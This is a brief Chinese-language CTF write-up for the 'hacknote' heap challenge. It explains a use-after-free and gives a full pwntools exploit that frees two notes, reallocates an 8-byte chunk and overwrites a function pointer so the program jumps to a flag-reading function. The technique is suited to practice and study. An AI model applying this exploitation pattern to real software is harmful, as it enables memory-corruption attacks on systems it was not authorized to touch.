这道题增加堆块会将printf函数的got表地址和将要打印的地址放入一个申请的堆块里面存在uaf漏洞可以先创建2个堆块然后释放申请0x8大小的堆块根据堆分配的原则我们先使用1的第一个然后使用0的第一个然后就修改了指针指向读到flag的函数即可
exp:
from pwn import *
p=process('./hacknote')
elf=ELF('./hacknote')
def debug():
gdb.attach(p)
def add(size,content):
p.recvuntil(':')
p.sendline('1')
p.recvuntil(':')
p.sendline(str(size))
p.recvuntil(':')
p.sendline(content)
def delete(idx):
p.recvuntil(':')
p.sendline('2')
p.recvuntil(':')
p.sendline(str(idx))
def printf(idx):
p.recvuntil(':')
p.sendline('3')
p.recvuntil(':')
p.sendline(str(idx))
#debug()
add(0x18,'aaaa') #idx 0
add(0x18,'bbbb') #idx 1
delete(0)
delete(1)
#printf(0)
add(8,p32(0x08048986))
printf(0)
p.interactive()
